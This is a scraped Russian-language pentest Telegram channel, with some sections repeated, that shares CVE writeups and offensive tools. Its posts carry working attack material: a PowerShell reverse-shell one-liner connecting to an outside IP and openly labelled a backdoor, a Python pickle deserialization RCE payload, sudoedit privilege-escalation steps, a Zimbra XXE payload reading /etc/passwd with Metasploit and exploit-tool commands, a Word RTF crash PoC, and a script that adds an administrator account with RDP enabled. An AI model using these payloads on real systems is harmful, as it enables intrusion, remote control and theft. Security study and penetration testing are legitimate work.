Обращение к пентестерам/ресерчерам по мобилкам. Если такие есть здесь. Накидайте пожалуйста непопулярного полезного материала, может даже ваши советы или лайфхаки. Любым конструктивным советам буду рад!
Похек
Разбор уязвимости LocalPotato CVE-2023-21746 на русском языке! LocalPotato CVE-2023-21746 Windows LPE После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное…
Свежая тачка по уязвимости LocalPotato. Советую прочитать мой анализ этой уязвимости для более глубокого анализа.
https://tryhackme.com/room/localpotato
#thm #cve
https://tryhackme.com/room/localpotato
#thm #cve
TryHackMe
LocalPotato
Learn how to elevate your privileges on Windows using LocalPotato (CVE-2023-21746).
Vulmap
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.
Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.
#tools
This media is not supported in your browser
VIEW IN TELEGRAM
SMBGhost (CVE-2020-0796) Automate Exploitation and Detection
Этот python-скрипт является оберткой от уязвимости RCE SMBGhost. Все заслуги за рабочий эксплойт - chompie1337. Все заслуги за сканер - ioncodes.
Я просто автоматизировал эти функции в одной программе. Вам нужно иметь в виду архитектуру Windows-мишени, когда вы собираетесь создать обратную оболочку.
Этот эксплойт не является стабильным, используйте его по своему усмотрению. Иногда он не срабатывает с первого раза, поэтому я добавил вторую попытку.
#tools
Этот python-скрипт является оберткой от уязвимости RCE SMBGhost. Все заслуги за рабочий эксплойт - chompie1337. Все заслуги за сканер - ioncodes.
Я просто автоматизировал эти функции в одной программе. Вам нужно иметь в виду архитектуру Windows-мишени, когда вы собираетесь создать обратную оболочку.
Этот эксплойт не является стабильным, используйте его по своему усмотрению. Иногда он не срабатывает с первого раза, поэтому я добавил вторую попытку.
#tools
👍5
Forwarded from Monkey Hacker
Python Deserialization via Pickle
# RU
У Python есть несколько методов сериализации объектов:
Модуль
Для эксплуатации мы будем использовать следующий метод:
Помимо этого есть еще библиотека
Этот модуль содержит различные методы, относящиеся к внутренним деталям модуля
Здесь нам потребуются два метода:
Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем
# EN
Python has several methods for serializing objects:
We will use the following method to exploit it:
This module contains various methods related to the pickle module's internals
Here we need two methods:
PAYLOAD
# RU
У Python есть несколько методов сериализации объектов:
Marshall и PickleМодуль
Pickle реализует двоичные протоколы для сериализации и десериализации объектов Python. Однако модуль Pickle не является безопасным и лучше распаковывать только те данные, которым вы доверяете.Для эксплуатации мы будем использовать следующий метод:
pickle.dumps(obj)Помимо этого есть еще библиотека
pickletoolsЭтот модуль содержит различные методы, относящиеся к внутренним деталям модуля
pickleЗдесь нам потребуются два метода:
pickletools.optimize()pickletools.dis()Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем
reduce в нашем классе# EN
Python has several methods for serializing objects:
Marshall and Pickle
The Pickle module implements binary protocols for serializing and deserializing Python objects. However, the Pickle module is not secure and will only decompress data that you trust.We will use the following method to exploit it:
pickle.dumps(obj)
Apart from that there is also the pickletools library.This module contains various methods related to the pickle module's internals
Here we need two methods:
pickletools.optimize()
pickletools.dis()
Now we can make our own payload to get the RCE. By the way, to serialize our payload as well, we use reduce in our classPAYLOAD
import base64
import pickle
import pickletools
import subprocess
class anti_pickle_serum:
def reduce(self):
command = ['id']
return subprocess.check_output, (command,)
exploit_obj = anti_pickle_serum()
raw_pickle = pickle.dumps({"serum" : exploit_obj}, protocol=0)
optimized_pickle = pickletools.optimize(raw_pickle)
pickletools.dis(optimized_pickle)
payload = base64.b64encode(raw_pickle)
print(payload)
THX:
https://docs.python.org/3/library/pickle.html
https://davidhamann.de/2020/04/05/exploiting-python-pickle/
https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd❤5
Forwarded from Monkey Hacker
Sudoedit Privilege Escalation (CVE-2023-22809)
#RU
Проверьте, что вы можете использовать sudoedit
Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root
Теперь вы можете читать/писать файлы с привилегиями root
#EN
Check that you can use sudoedit
By introducing an extra dash, we can make our editor work as root
Now you can read/write files with root
Tools:
#RU
Проверьте, что вы можете использовать sudoedit
cat /etc/sudoersВведя дополнительный дэш, мы можем заставить наш редактор работать от имени root
export EDITOR='vim -- /path/to/your/files'Теперь вы можете читать/писать файлы с привилегиями root
sudoedit /etc/custom/service.conf#EN
Check that you can use sudoedit
cat /etc/sudoersBy introducing an extra dash, we can make our editor work as root
export EDITOR='vim -- /path/to/your/files'Now you can read/write files with root
sudoedit /etc/custom/service.confTools:
https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privescForwarded from Эффект пентестера
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
🔥5
XXE to RCE Zimbra CVE-2019-9670
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
Metasploit:
Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
xxe [Ниже приведу парочку примеров, как эксплуатировать эту вулну.
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rceArambiz - эксплойт на Python3:
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit
clone https://github.com/oppsec/arbimz.gitZaber - эксплойт на Go:
pip3 install -r requirements.txt
python3 main.py --url https://example.com/
install github.com/oppsec/zaber@latestЕсли у вас не находит бинарь, то пропишите абсолютный путь.
zaber -u https://example.com
-u https://example.comА после работ не забудьте добавить
$HOME/go/bin/ в свой PATH 😉Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
Forwarded from Monkey Hacker
Сreate user via bat file extension
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
Monkey Hacker
Сreate user via bat file extension #RU На данный момент изучаю Windows и его приколы. Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP. #EN I am currently learning Windows and its tricks. Here is a noscript to create…
Подписывайте на этого крутого парня, который днём и ночью, 25/8 изучает Bitrix ради интереса
CVE-2023-23415 ICMP RCE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Forwarded from Monkey Hacker
Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
2.
Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
Сценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
Звучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuotaЧтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool2.
При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD. Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегийСценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
Kerberos TGT с использованием обновленного имени учетной записи компьютера.4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
S4U2selfЗвучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.htmlhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.tomlhttps://github.com/WazeHell/sam-the-adminGitHub
GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости
В этой статье мы рассмотрим, как использовалась уязвимость
#CVE #RCE #моястатья
В этой статье мы рассмотрим, как использовалась уязвимость
use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения PDF. В итоге была успешно использована уязвимость для удаленного выполнения кода в Adobe Acrobat Reader.#CVE #RCE #моястатья
🌚4🔥2
Похек
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости В этой статье мы рассмотрим, как использовалась уязвимость use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения…
Большое спасибо за столь активное распространение поста!
Люблю всех вас 🛡️
Люблю всех вас 🛡️
🐳4
Forwarded from Proxy Bar
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!
usage:
Тупо бэкдор!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"🔥1